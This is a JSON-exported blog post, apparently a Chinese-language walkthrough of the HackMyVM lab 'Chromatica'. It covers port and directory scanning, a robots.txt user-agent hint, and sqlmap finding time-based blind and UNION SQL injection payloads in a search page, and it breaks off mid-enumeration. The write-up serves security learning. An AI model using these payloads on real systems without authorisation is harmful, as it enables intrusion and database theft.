{"id":679,"date":"2024-05-13T19:24:31","date_gmt":"2024-05-13T11:24:31","guid":{"rendered":"http:\/\/162.14.82.114\/?p=679"},"modified":"2024-05-13T19:24:31","modified_gmt":"2024-05-13T11:24:31","slug":"hmv-_-chromatica","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/679\/05\/13\/2024\/","title":{"rendered":"hmv[-_-]Chromatica"},"content":{"rendered":"<h1>Chromatica<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922881.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922881.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240513175133861\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922883.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922883.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240513175624073\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/chromatica]\n\u2514\u2500$ rustscan -a 172.20.10.3 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nReal hackers hack time \u231b\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 172.20.10.3:22\nOpen 172.20.10.3:80\nOpen 172.20.10.3:5353\n\nPORT     STATE SERVICE REASON  VERSION\n22\/tcp   open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   256 7c:94:7f:cb:4a:d5:8b:9f:9e:ff:7b:7a:59:ff:75:b5 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBILuE7emxat5+R\/en2quENVPigrmN45CWha4pupWvL0lT1\/q0tFYaB0LoABPlVKs5\/Dob23Exi5jYdV1PugUPlM=|   256 ed:94:2a:fc:30:30:cc:07:ae:27:7d:ca:92:01:49:31 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIISi3povKIr32D6ShYBi21LE4gRFcGy\/pMv\/ccuSu1Xs\n80\/tcp   open  http    syn-ack Apache httpd 2.4.52 ((Ubuntu))\n| http-methods: \n|_  Supported Methods: GET POST OPTIONS HEAD\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\n|_http-title: Chromatica|Coming Soon..... \n|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA\n5353\/tcp open  domain  syn-ack dnsmasq 2.86\n| dns-nsid: \n|_  bind.version: dnsmasq-2.86\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/chromatica]\n\u2514\u2500$ gobuster dir -u http:\/\/172.20.10.3 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x bak,txt,html,zip,php\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/172.20.10.3\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              bak,txt,html,zip,php\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 276]\n\/.html                (Status: 403) [Size: 276]\n\/index.html           (Status: 200) [Size: 4047]\n\/assets               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.3\/assets\/]\n\/css                  (Status: 301) [Size: 308] [--&gt; http:\/\/172.20.10.3\/css\/]\n\/js                   (Status: 301) [Size: 307] [--&gt; http:\/\/172.20.10.3\/js\/]\n\/javascript           (Status: 301) [Size: 315] [--&gt; http:\/\/172.20.10.3\/javascript\/]\n\/robots.txt           (Status: 200) [Size: 36]\nProgress: 64049 \/ 1323366 (4.84%)[ERROR] Get &quot;http:\/\/172.20.10.3\/2005-February.html&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/172.20.10.3\/2005-February.zip&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/172.20.10.3\/2506.txt&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/172.20.10.3\/2506.php&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/172.20.10.3\/2005-March.html&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/172.20.10.3\/2005-February.txt&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 64059 \/ 1323366 (4.84%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 64069 \/ 1323366 (4.84%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/chromatica]\n\u2514\u2500$ sudo dirsearch -u http:\/\/172.20.10.3 -e* -i 200,300-399 2&gt;\/dev\/null\n[sudo] password for kali: \n\n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\n\nOutput File: \/home\/kali\/temp\/chromatica\/reports\/http_172.20.10.3\/_24-05-13_06-01-27.txt\n\nTarget: http:\/\/172.20.10.3\/\n\n[06:01:27] Starting: \n[06:01:27] 301 -  307B  - \/js  -&gt;  http:\/\/172.20.10.3\/js\/\n[06:01:53] 301 -  311B  - \/assets  -&gt;  http:\/\/172.20.10.3\/assets\/\n[06:01:53] 200 -  488B  - \/assets\/\n[06:01:59] 301 -  308B  - \/css  -&gt;  http:\/\/172.20.10.3\/css\/\n[06:02:11] 301 -  315B  - \/javascript  -&gt;  http:\/\/172.20.10.3\/javascript\/\n[06:02:11] 200 -  504B  - \/js\/\n[06:02:30] 200 -   36B  - \/robots.txt\n\nTask Completed<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922884.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922884.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240513175714791\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922886.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922886.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240513175729347\" style=\"zoom:33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922887.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922887.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240513175741760\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h3>\u654f\u611f\u76ee\u5f55<\/h3>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.3\/robots.txt<\/code><\/pre>\n<pre><code class=\"language-text\">user-agent: dev\nAllow: \/dev-portal\/<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4f7f\u7528wpscan\u626b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/chromatica]\n\u2514\u2500$ wpscan --url http:\/\/172.20.10.3 -e u --api-token xxxxxx\n_______________________________________________________________\n         __          _______   _____\n         \\ \\        \/ \/  __ \\ \/ ____|\n          \\ \\  \/\\  \/ \/| |__) | (___   ___  __ _ _ __ \u00ae\n           \\ \\\/  \\\/ \/ |  ___\/ \\___ \\ \/ __|\/ _` | &#039;_ \\\n            \\  \/\\  \/  | |     ____) | (__| (_| | | | |\n             \\\/  \\\/   |_|    |_____\/ \\___|\\__,_|_| |_|\n\n         WordPress Security Scanner by the WPScan Team\n                         Version 3.8.25\n       Sponsored by Automattic - https:\/\/automattic.com\/\n       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[i] It seems like you have not updated the database for some time.\n[?] Do you want to update now? [Y]es [N]o, default: [N]Y\n[i] Updating the Database ...\n[i] Update completed.\n\nScan Aborted: The remote website is up, but does not seem to be running WordPress.<\/code><\/pre>\n<p>\u770b\u6765\u73b0\u5728\u8fd8\u4e0d\u662f\u65f6\u5019\uff0c\u7ee7\u7eed\u5c1d\u8bd5\uff1a<\/p>\n<h3>FUZZ<\/h3>\n<p>\u6307\u5b9a<code>User-agent<\/code>\u5c1d\u8bd5\u8fdb\u884c\u626b\u63cf\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/chromatica]\n\u2514\u2500$ gobuster dir -u http:\/\/172.20.10.3\/dev-portal\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x bak,txt,html,zip,php -H &quot;User-agent: dev&quot;\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/172.20.10.3\/dev-portal\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              txt,html,zip,php,bak\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 276]\n\/.php                 (Status: 403) [Size: 276]\n\/index.html           (Status: 200) [Size: 527]\n\/login.php            (Status: 200) [Size: 609]\n\/search.php           (Status: 200) [Size: 844]\n\/assets               (Status: 301) [Size: 322] [--&gt; http:\/\/172.20.10.3\/dev-portal\/assets\/]\n\/css                  (Status: 301) [Size: 319] [--&gt; http:\/\/172.20.10.3\/dev-portal\/css\/]\nProgress: 18192 \/ 1323366 (1.37%)\n[!] Keyboard interrupt detected, terminating.\nProgress: 18197 \/ 1323366 (1.38%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/chromatica]\n\u2514\u2500$ feroxbuster -u http:\/\/172.20.10.3\/dev-portal\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -H &quot;User-agent: dev&quot; -d 3 -s 200 301 302 \n ___  ___  __   __     __      __         __   ___\n|__  |__  |__) |__) | \/  `    \/  \\ \\_\/ | |  \\ |__\n|    |___ |  \\ |  \\ | \\__,    \\__\/ \/ \\ | |__\/ |___\nby Ben &quot;epi&quot; Risher \ud83e\udd13                 ver: 2.10.2\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf  Target Url            \u2502 http:\/\/172.20.10.3\/dev-portal\/\n \ud83d\ude80  Threads               \u2502 50\n \ud83d\udcd6  Wordlist              \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c  Status Codes          \u2502 [200, 301, 302]\n \ud83d\udca5  Timeout (secs)        \u2502 7\n \ud83e\udda1  User-Agent            \u2502 feroxbuster\/2.10.2\n \ud83d\udc89  Config File           \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83e\udd2f  Header                \u2502 User-agent:  dev\n \ud83d\udd0e  Extract Links         \u2502 true\n \ud83c\udfc1  HTTP methods          \u2502 [GET]\n \ud83d\udd03  Recursion Depth       \u2502 3\n \ud83c\udf89  New Version Available \u2502 https:\/\/github.com\/epi052\/feroxbuster\/releases\/latest\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1  Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n200      GET        2l       33w      844c http:\/\/172.20.10.3\/dev-portal\/search.php\n301      GET        9l       28w      322c http:\/\/172.20.10.3\/dev-portal\/assets =&gt; http:\/\/172.20.10.3\/dev-portal\/assets\/\n200      GET     1521l     7816w   611312c http:\/\/172.20.10.3\/dev-portal\/assets\/img\/bg-mobile-fallback.jpg\n301      GET        9l       28w      319c http:\/\/172.20.10.3\/dev-portal\/css =&gt; http:\/\/172.20.10.3\/dev-portal\/css\/\n200      GET       92l      170w     1508c http:\/\/172.20.10.3\/dev-portal\/css\/style.css\n200      GET       19l       39w      527c http:\/\/172.20.10.3\/dev-portal\/\n200      GET       63l      119w     1045c http:\/\/172.20.10.3\/dev-portal\/css\/login.css\n[####################] - 3m    220561\/220561  0s      found:7       errors:2      \n[####################] - 3m    220546\/220546  1056\/s  http:\/\/172.20.10.3\/dev-portal\/ \n[####################] - 4s    220546\/220546  57314\/s http:\/\/172.20.10.3\/dev-portal\/css\/ =&gt; Directory listing\n[####################] - 0s    220546\/220546  11027300\/s http:\/\/172.20.10.3\/dev-portal\/assets\/ =&gt; Directory listing\n[####################] - 0s    220546\/220546  1480174\/s http:\/\/172.20.10.3\/dev-portal\/assets\/img\/ =&gt; Directory listing<\/code><\/pre>\n<p>\u8fdb\u884c\u67e5\u770b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/chromatica]\n\u2514\u2500$ curl -i -s http:\/\/172.20.10.3\/dev-portal\/search.php -H &quot;User-Agent: dev&quot;\nHTTP\/1.1 200 OK\nDate: Mon, 13 May 2024 10:24:13 GMT\nServer: Apache\/2.4.52 (Ubuntu)\nVary: User-Agent,Accept-Encoding\nContent-Length: 844\nContent-Type: text\/html; charset=UTF-8\n\n&lt;table&gt;&lt;tr&gt;&lt;th&gt;City&lt;\/th&gt;&lt;th&gt;Population&lt;\/th&gt;&lt;th&gt;Postal Code&lt;\/th&gt;&lt;\/tr&gt;&lt;tr&gt;&lt;td&gt;New York City&lt;\/td&gt;&lt;td&gt;8336817&lt;\/td&gt;&lt;td&gt;10001&lt;\/td&gt;&lt;\/tr&gt;&lt;tr&gt;&lt;td&gt;Los Angeles&lt;\/td&gt;&lt;td&gt;3979576&lt;\/td&gt;&lt;td&gt;90001&lt;\/td&gt;&lt;\/tr&gt;&lt;tr&gt;&lt;td&gt;Chicago&lt;\/td&gt;&lt;td&gt;2693976&lt;\/td&gt;&lt;td&gt;60601&lt;\/td&gt;&lt;\/tr&gt;&lt;tr&gt;&lt;td&gt;Houston&lt;\/td&gt;&lt;td&gt;2320268&lt;\/td&gt;&lt;td&gt;77001&lt;\/td&gt;&lt;\/tr&gt;&lt;tr&gt;&lt;td&gt;Phoenix&lt;\/td&gt;&lt;td&gt;1680992&lt;\/td&gt;&lt;td&gt;85001&lt;\/td&gt;&lt;\/tr&gt;&lt;tr&gt;&lt;td&gt;Philadelphia&lt;\/td&gt;&lt;td&gt;1584064&lt;\/td&gt;&lt;td&gt;19101&lt;\/td&gt;&lt;\/tr&gt;&lt;tr&gt;&lt;td&gt;San Antonio&lt;\/td&gt;&lt;td&gt;1547253&lt;\/td&gt;&lt;td&gt;78201&lt;\/td&gt;&lt;\/tr&gt;&lt;tr&gt;&lt;td&gt;San Diego&lt;\/td&gt;&lt;td&gt;1425976&lt;\/td&gt;&lt;td&gt;92101&lt;\/td&gt;&lt;\/tr&gt;&lt;tr&gt;&lt;td&gt;Dallas&lt;\/td&gt;&lt;td&gt;1317929&lt;\/td&gt;&lt;td&gt;75201&lt;\/td&gt;&lt;\/tr&gt;&lt;tr&gt;&lt;td&gt;San Jose&lt;\/td&gt;&lt;td&gt;1030119&lt;\/td&gt;&lt;td&gt;95101&lt;\/td&gt;&lt;\/tr&gt;&lt;tr&gt;&lt;td&gt;Paris&lt;\/td&gt;&lt;td&gt;2140526&lt;\/td&gt;&lt;td&gt;75001&lt;\/td&gt;&lt;\/tr&gt;&lt;\/table&gt;&lt;a href=&quot;index.html&quot;&gt; take me back &lt;\/a&gt;\n&lt;!-- please for the love of god someone paint this page a color will ya it looks dreadfull uhhhhj --&gt;<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922888.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922888.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240513182512839\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922889.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922889.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240513183546510\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>sql\u6ce8\u5165<\/h3>\n<p>\u5c1d\u8bd5\u6293\u5305\u8fdb\u884csql\u6ce8\u5165\uff1a<\/p>\n<pre><code class=\"language-bash\">POST \/dev-portal\/login.php HTTP\/1.1\nHost: 172.20.10.3\nContent-Length: 39\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http:\/\/172.20.10.3\nContent-Type: application\/x-www-form-urlencoded\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nReferer: http:\/\/172.20.10.3\/dev-portal\/login.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\n\nusername=admin&amp;password=password&amp;login=<\/code><\/pre>\n<p>\u4fee\u6539\u6389<code>User-Agent<\/code>\u7136\u540e\u5c1d\u8bd5\u6ce8\u5165\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922890.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922890.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240513183026026\" style=\"zoom:67%;\" \/><\/div><\/p>\n<p>\u5636\u3002\u3002\u3002\u3002<\/p>\n<p>\u6362\u4e00\u4e2a\u770b\u770b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922891.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405131922891.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240513183628435\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u6ce8\u5165\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/chromatica]\n\u2514\u2500$ sqlmap -u &quot;http:\/\/172.20.10.3\/dev-portal\/search.php?city=Chicago&quot; --user-agent=&quot;dev&quot;\n        ___\n       __H__\n ___ ___[,]_____ ___ ___  {1.8.3#stable}\n|_ -| . [&quot;]     | .&#039;| . |\n|___|_  [.]_|_|_|__,|  _|\n      |_|V...       |_|   https:\/\/sqlmap.org\n\nsqlmap identified the following injection point(s) with a total of 59 HTTP(s) requests:\n---\nParameter: city (GET)\n    Type: time-based blind\n    Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)\n    Payload: city=Chicago&#039; AND (SELECT 9837 FROM (SELECT(SLEEP(5)))RDYU) AND &#039;vCNS&#039;=&#039;vCNS\n\n    Type: UNION query\n    Title: Generic UNION query (NULL) - 4 columns\n    Payload: city=Chicago&#039; UNION ALL SELECT NULL,CONCAT(0x716b707171,0x655952524c7a6b4a6c486775534d474c714c574b6844714c45696e724c76514a696866515a6b5062,0x71786a6b71),NULL,NULL-- -\n---<\/code><\/pre>\n<pre><code class=\"language-bash\">sqlmap -u &quot;http:\/\/172.20.10.3\/dev-portal\/search.php?city=Chicago&quot; --user-agent=&quot;dev&quot; --dbs\navailable databases [2]:\n[*] Chromatica\n[*] information_schema\n\nsqlmap -u &quot;http:\/\/172.20.10.3\/dev-portal\/search.php?city=Chicago&quot; --user-agent=&quot;dev&quot; -D Chromatica 